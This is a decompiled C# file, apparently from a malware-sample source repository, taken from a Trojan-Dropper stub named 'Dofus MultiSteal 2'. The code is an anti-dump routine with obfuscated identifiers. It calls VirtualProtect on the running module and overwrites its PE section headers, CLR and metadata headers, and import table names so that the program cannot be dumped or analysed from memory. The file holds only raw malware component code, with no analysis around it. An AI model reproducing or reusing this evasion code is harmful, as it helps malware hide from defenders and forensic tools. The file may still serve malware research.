MalwareSourceCode/MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.auww-b56915160d2d8d725e2d54a5b16a636ea854d31f8fa85a3d1e207112b177ddb1/뜴䷯֛걠䉋넊烽껭.cs

254 lines
9.8 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: 뜴䷯֛걠䉋넊烽껭
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: F8CCC811-F0AE-43F4-8180-670E2BBAD259
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auww-b56915160d2d8d725e2d54a5b16a636ea854d31f8fa85a3d1e207112b177ddb1.exe
using System;
using System.Runtime.InteropServices;
internal static class \u4DEF֛걠䉋넊烽껭
{
[DllImport("kernel32.dll", EntryPoint = "VirtualProtect", PreserveSig = false)]
private static extern unsafe bool \uFFFD㜟\uFFFD(
byte* lpAddress,
int dwSize,
uint flNewProtect,
out uint lpflOldProtect);
public static unsafe void \u0098ंਕ\uE3C1()
{
byte* hinstance = (byte*) (void*) Marshal.GetHINSTANCE(typeof (\u4DEF֛걠䉋넊烽껭).Module);
byte* numPtr1 = hinstance + 60;
byte* numPtr2 = hinstance + (int) *(uint*) numPtr1 + 6;
ushort length = *(ushort*) numPtr2;
byte* numPtr3 = numPtr2 + 14;
ushort num1 = *(ushort*) numPtr3;
byte* numPtr4 = numPtr3 + 4 + (int) num1;
// ISSUE: untyped stack allocation
byte* numPtr5 = (byte*) __untypedstackalloc(new IntPtr(11));
*(int*) numPtr5 = 1818522734;
*(int*) (numPtr5 + 4) = 1818504812;
*(short*) (numPtr5 + 8) = (short) 108;
numPtr5[10] = (byte) 0;
// ISSUE: untyped stack allocation
byte* numPtr6 = (byte*) __untypedstackalloc(new IntPtr(11));
*(int*) numPtr6 = 1866691662;
*(int*) (numPtr6 + 4) = 1852404846;
*(short*) (numPtr6 + 8) = (short) 25973;
numPtr6[10] = (byte) 0;
if (typeof (\u4DEF֛걠䉋넊烽껭).Module.FullyQualifiedName != "<Unknown>")
{
uint lpflOldProtect;
\u4DEF֛걠䉋넊烽껭.\uFFFD㜟\uFFFD(numPtr4 - 16, 8, 64U, out lpflOldProtect);
*(int*) (numPtr4 - 12) = 0;
byte* lpAddress1 = hinstance + (int) *(uint*) (numPtr4 - 16);
*(int*) (numPtr4 - 16) = 0;
if (*(uint*) (numPtr4 - 120) != 0U)
{
byte* numPtr7 = hinstance + (int) *(uint*) (numPtr4 - 120);
byte* numPtr8 = hinstance + (int) *(uint*) numPtr7;
byte* lpAddress2 = hinstance + (int) *(uint*) (numPtr7 + 12);
byte* lpAddress3 = hinstance + (int) *(uint*) numPtr8 + 2;
\u4DEF֛걠䉋넊烽껭.\uFFFD㜟\uFFFD(lpAddress2, 11, 64U, out lpflOldProtect);
for (int index = 0; index < 11; index++)
lpAddress2[index] = numPtr5[index];
\u4DEF֛걠䉋넊烽껭.\uFFFD㜟\uFFFD(lpAddress3, 11, 64U, out lpflOldProtect);
for (int index = 0; index < 11; ++index)
lpAddress3[index] = numPtr6[index];
}
for (int index = 0; index < (int) length; index++)
{
\u4DEF֛걠䉋넊烽껭.\uFFFD㜟\uFFFD(numPtr4, 8, 64U, out lpflOldProtect);
Marshal.Copy(new byte[8], 0, (IntPtr) (void*) numPtr4, 8);
numPtr4 += 40;
}
\u4DEF֛걠䉋넊烽껭.\uFFFD㜟\uFFFD(lpAddress1, 72, 64U, out lpflOldProtect);
byte* lpAddress4 = hinstance + (int) *(uint*) (lpAddress1 + 8);
*(int*) lpAddress1 = 0;
*(int*) (lpAddress1 + 4) = 0;
*(int*) (lpAddress1 + 8) = 0;
*(int*) (lpAddress1 + 12) = 0;
\u4DEF֛걠䉋넊烽껭.\uFFFD㜟\uFFFD(lpAddress4, 4, 64U, out lpflOldProtect);
*(int*) lpAddress4 = 0;
byte* numPtr9 = lpAddress4 + 12;
byte* numPtr10 = (byte*) ((ulong) ((uint) (numPtr9 + (int) *(uint*) numPtr9) + 7U) & 18446744073709551612UL) + 2;
ushort num2 = (ushort) *numPtr10;
byte* lpAddress5 = numPtr10 + 2;
for (int index1 = 0; index1 < (int) num2; index1++)
{
\u4DEF֛걠䉋넊烽껭.\uFFFD㜟\uFFFD(lpAddress5, 8, 64U, out lpflOldProtect);
*(int*) lpAddress5 = 0;
byte* numPtr11 = lpAddress5 + 4;
*(int*) numPtr11 = 0;
lpAddress5 = numPtr11 + 4;
for (int index2 = 0; index2 < 8; ++index2)
{
\u4DEF֛걠䉋넊烽껭.\uFFFD㜟\uFFFD(lpAddress5, 4, 64U, out lpflOldProtect);
*lpAddress5 = (byte) 0;
byte* numPtr12 = lpAddress5 + 1;
if (*numPtr12 == (byte) 0)
{
lpAddress5 = numPtr12 + 3;
break;
}
*numPtr12 = (byte) 0;
byte* numPtr13 = numPtr12 + 1;
if (*numPtr13 != (byte) 0)
{
*numPtr13 = (byte) 0;
byte* numPtr14 = numPtr13 + 1;
if (*numPtr14 != (byte) 0)
{
*numPtr14 = (byte) 0;
lpAddress5 = numPtr14 + 1;
}
else
{
lpAddress5 = numPtr14 + 1;
break;
}
}
else
{
lpAddress5 = numPtr13 + 2;
break;
}
}
}
}
else
{
uint lpflOldProtect;
\u4DEF֛걠䉋넊烽껭.\uFFFD㜟\uFFFD(numPtr4 - 16, 8, 64U, out lpflOldProtect);
*(int*) (numPtr4 - 12) = 0;
uint num3 = *(uint*) (numPtr4 - 16);
*(int*) (numPtr4 - 16) = 0;
uint num4 = *(uint*) (numPtr4 - 120);
uint[] numArray1 = new uint[(int) length];
uint[] numArray2 = new uint[(int) length];
uint[] numArray3 = new uint[(int) length];
for (int index = 0; index < (int) length; ++index)
{
\u4DEF֛걠䉋넊烽껭.\uFFFD㜟\uFFFD(numPtr4, 8, 64U, out lpflOldProtect);
Marshal.Copy(new byte[8], 0, (IntPtr) (void*) numPtr4, 8);
numArray1[index] = *(uint*) (numPtr4 + 12);
numArray2[index] = *(uint*) (numPtr4 + 8);
numArray3[index] = *(uint*) (numPtr4 + 20);
numPtr4 += 40;
}
if (num4 != 0U)
{
for (int index = 0; index < (int) length; index++)
{
if (numArray1[index] < num4 && num4 < numArray1[index] + numArray2[index])
{
num4 = num4 - numArray1[index] + numArray3[index];
break;
}
}
byte* numPtr15 = hinstance + (int) num4;
uint num5 = *(uint*) numPtr15;
for (int index = 0; index < (int) length; ++index)
{
if (numArray1[index] < num5 && num5 < numArray1[index] + numArray2[index])
{
num5 = num5 - numArray1[index] + numArray3[index];
break;
}
}
byte* numPtr16 = hinstance + (int) num5;
uint num6 = *(uint*) (numPtr15 + 12);
for (int index = 0; index < (int) length; ++index)
{
if (numArray1[index] < num6 && num6 < numArray1[index] + numArray2[index])
{
num6 = num6 - numArray1[index] + numArray3[index];
break;
}
}
uint num7 = *(uint*) numPtr16 + 2U;
for (int index = 0; index < (int) length; index++)
{
if (numArray1[index] < num7 && num7 < numArray1[index] + numArray2[index])
{
num7 = num7 - numArray1[index] + numArray3[index];
break;
}
}
\u4DEF֛걠䉋넊烽껭.\uFFFD㜟\uFFFD(hinstance + (int) num6, 11, 64U, out lpflOldProtect);
for (int index = 0; index < 11; index++)
(hinstance + (int) num6)[index] = numPtr5[index];
\u4DEF֛걠䉋넊烽껭.\uFFFD㜟\uFFFD(hinstance + (int) num7, 11, 64U, out lpflOldProtect);
for (int index = 0; index < 11; ++index)
(hinstance + (int) num7)[index] = numPtr6[index];
}
for (int index = 0; index < (int) length; ++index)
{
if (numArray1[index] < num3 && num3 < numArray1[index] + numArray2[index])
{
num3 = num3 - numArray1[index] + numArray3[index];
break;
}
}
byte* lpAddress6 = hinstance + (int) num3;
\u4DEF֛걠䉋넊烽껭.\uFFFD㜟\uFFFD(lpAddress6, 72, 64U, out lpflOldProtect);
uint num8 = *(uint*) (lpAddress6 + 8);
for (int index = 0; index < (int) length; ++index)
{
if (numArray1[index] < num8 && num8 < numArray1[index] + numArray2[index])
{
num8 = num8 - numArray1[index] + numArray3[index];
break;
}
}
*(int*) lpAddress6 = 0;
*(int*) (lpAddress6 + 4) = 0;
*(int*) (lpAddress6 + 8) = 0;
*(int*) (lpAddress6 + 12) = 0;
byte* lpAddress7 = hinstance + (int) num8;
\u4DEF֛걠䉋넊烽껭.\uFFFD㜟\uFFFD(lpAddress7, 4, 64U, out lpflOldProtect);
*(int*) lpAddress7 = 0;
byte* numPtr17 = lpAddress7 + 12;
byte* numPtr18 = (byte*) ((ulong) ((uint) (numPtr17 + (int) *(uint*) numPtr17) + 7U) & 18446744073709551612UL) + 2;
ushort num9 = (ushort) *numPtr18;
byte* lpAddress8 = numPtr18 + 2;
for (int index3 = 0; index3 < (int) num9; ++index3)
{
\u4DEF֛걠䉋넊烽껭.\uFFFD㜟\uFFFD(lpAddress8, 8, 64U, out lpflOldProtect);
*(int*) lpAddress8 = 0;
byte* numPtr19 = lpAddress8 + 4;
*(int*) numPtr19 = 0;
lpAddress8 = numPtr19 + 4;
for (int index4 = 0; index4 < 8; ++index4)
{
\u4DEF֛걠䉋넊烽껭.\uFFFD㜟\uFFFD(lpAddress8, 4, 64U, out lpflOldProtect);
*lpAddress8 = (byte) 0;
byte* numPtr20 = lpAddress8 + 1;
if (*numPtr20 == (byte) 0)
{
lpAddress8 = numPtr20 + 3;
break;
}
*numPtr20 = (byte) 0;
byte* numPtr21 = numPtr20 + 1;
if (*numPtr21 == (byte) 0)
{
lpAddress8 = numPtr21 + 2;
break;
}
*numPtr21 = (byte) 0;
byte* numPtr22 = numPtr21 + 1;
if (*numPtr22 == (byte) 0)
{
lpAddress8 = numPtr22 + 1;
break;
}
*numPtr22 = (byte) 0;
lpAddress8 = numPtr22 + 1;
}
}
}
}
}